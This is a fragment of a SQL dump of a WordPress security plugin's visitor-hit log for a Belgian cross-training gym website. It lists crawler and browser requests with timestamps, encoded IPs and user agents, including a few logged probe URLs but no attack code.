(69148, 1491793924.072562, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69149, 1491794086.001481, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69150, 1491794086.466762, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69151, 1491794108.151044, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69152, 1491794113.187658, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69153, 1491794117.610574, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69154, 1491797754.267323, 3657087992, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(69155, 1491797897.197510, 135738378, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko'),
(69156, 1491798908.169853, 872548958, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'ltx71 - (http://ltx71.com/)'),
(69157, 1491800289.263123, 3657087992, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(69158, 1491803556.230533, 3657087992, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(69159, 1491808485.572123, 3657087992, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(69160, 1491809471.376588, 3475901941, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69161, 1491815543.708085, 1570674758, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69162, 1491815547.418247, 100662546, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69163, 1491817070.220710, 3475901917, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69164, 1491817117.496361, 3657087992, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(69165, 1491817579.308440, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69166, 1491817579.994207, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69167, 1491817580.615393, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69168, 1491817581.118309, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69169, 1491817581.660927, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69170, 1491817582.227779, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69171, 1491817582.839268, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69172, 1491817583.343362, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69173, 1491817583.816990, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69174, 1491817584.349489, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69175, 1491817584.894862, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69176, 1491820064.562780, 1567842264, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://burger-imperia.com/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36'),
(70970, 1493442505.435741, 1540531433, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Opera/9.80 (Windows NT 6.1) Presto/2.12 Version/12.15'),
(70971, 1493449001.037064, 2745971880, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/ubh/up.php', 'http://www.crosstrainingcenter.be/wp-content/plugins/ubh/up.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(70972, 1493453422.995921, 3162553515, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70973, 1493463277.121586, 635303436, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/gravityforms/css/preview.css', '', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)'),
(70974, 1493463947.229712, 1538506743, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(70975, 1493463949.142741, 1538506743, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(70976, 1493463968.161105, 1538506743, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(70977, 1493464098.611255, 1538506743, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(70978, 1493464104.688086, 1538506743, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(70979, 1493469508.299367, 3107604753, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70980, 1493469532.449067, 3107604753, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70981, 1493471066.992549, 2760155453, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(70982, 1493471087.023984, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(70983, 1493478794.201639, 1123631646, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70984, 1493478794.757810, 1123631646, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70985, 1493479458.561133, 2366148252, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70986, 1493479462.261989, 2366148120, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70987, 1493479480.721963, 2996485381, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70988, 1493479486.982820, 2996488207, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70989, 1493481234.271104, 1123631762, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70990, 1493481235.183386, 1123631630, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70991, 1493481235.617677, 1123631630, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70992, 1493486958.845977, 1570674703, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70993, 1493490577.312401, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(70994, 1493490578.854672, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70995, 1493490579.335043, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70996, 1493490579.749951, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70997, 1493490580.767832, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70998, 1493490581.184609, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70999, 1493490581.599107, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71000, 1493490582.163784, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(71001, 1493490582.563298, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71002, 1493490582.961355, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71003, 1493490583.379156, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71004, 1493490583.820294, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71005, 1493490584.211603, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71006, 1493490584.608737, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71007, 1493491708.962157, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71008, 1493491710.245315, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71009, 1493491720.786446, 2297635928, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71010, 1493491725.849907, 2297635928, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71011, 1493491738.152370, 2297635928, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71012, 1493491746.167059, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71013, 1493491752.841365, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71014, 1493491761.944590, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71015, 1493491767.023871, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71016, 1493491776.424484, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71017, 1493491788.878847, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71018, 1493491801.709688, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71019, 1493491809.516200, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71020, 1493491819.552945, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71021, 1493491829.837192, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71022, 1493491918.049338, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71023, 1493491929.420289, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71024, 1493492926.203498, 2637637379, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71025, 1493493052.012638, 2637637511, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71026, 1493493826.876417, 1538461206, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8'),
(71027, 1493493828.718095, 1538461206, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8'),
(71028, 1493493879.532217, 1375112542, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71029, 1493493880.293354, 1375112542, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71030, 1493493880.839725, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71031, 1493493881.472847, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71032, 1493493882.004078, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71033, 1493493882.526857, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71034, 1493493883.204412, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71035, 1493493883.768890, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71036, 1493493884.267833, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71037, 1493493884.787546, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71038, 1493493885.194622, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71039, 1493501073.111919, 1123634273, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71040, 1493508375.731000, 1123634273, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71041, 1493509970.565093, 1374774657, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71042, 1493509977.413826, 1374774657, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71043, 1493512506.259914, 1450079886, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/533.95.42 (KHTML, like Gecko) Version/5.3.8 Safari/531.87'),
(71044, 1493512513.385097, 1450079886, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/533.95.42 (KHTML, like Gecko) Version/5.3.8 Safari/531.87'),
(71045, 1493512717.908982, 3233510666, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/component/users/?view=login', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),
(71046, 1493512721.181583, 3233510666, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/component/users/?view=login', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),
(71047, 1493514818.632723, 3024883603, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(71048, 1493517534.971313, 1123631630, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71049, 1493518445.545983, 1123634273, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71050, 1493519677.146542, 1123634273, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71051, 1493523355.796762, 1123634273, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71052, 1493533088.034695, 1123631630, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71053, 1493533291.984593, 3475901821, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71054, 1493533716.402841, 2637637474, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71055, 1493536220.815798, 676177816, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71056, 1493536220.877966, 676177816, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71057, 1493539969.663714, 2637637590, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71058, 1493567251.456215, 3024883468, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(71059, 1493569769.596676, 3657084251, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(71060, 1493570884.778342, 1375112542, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71061, 1493570885.446928, 1375112542, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71062, 1493570885.872599, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71063, 1493570886.306168, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71064, 1493570886.739696, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71065, 1493570887.225123, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
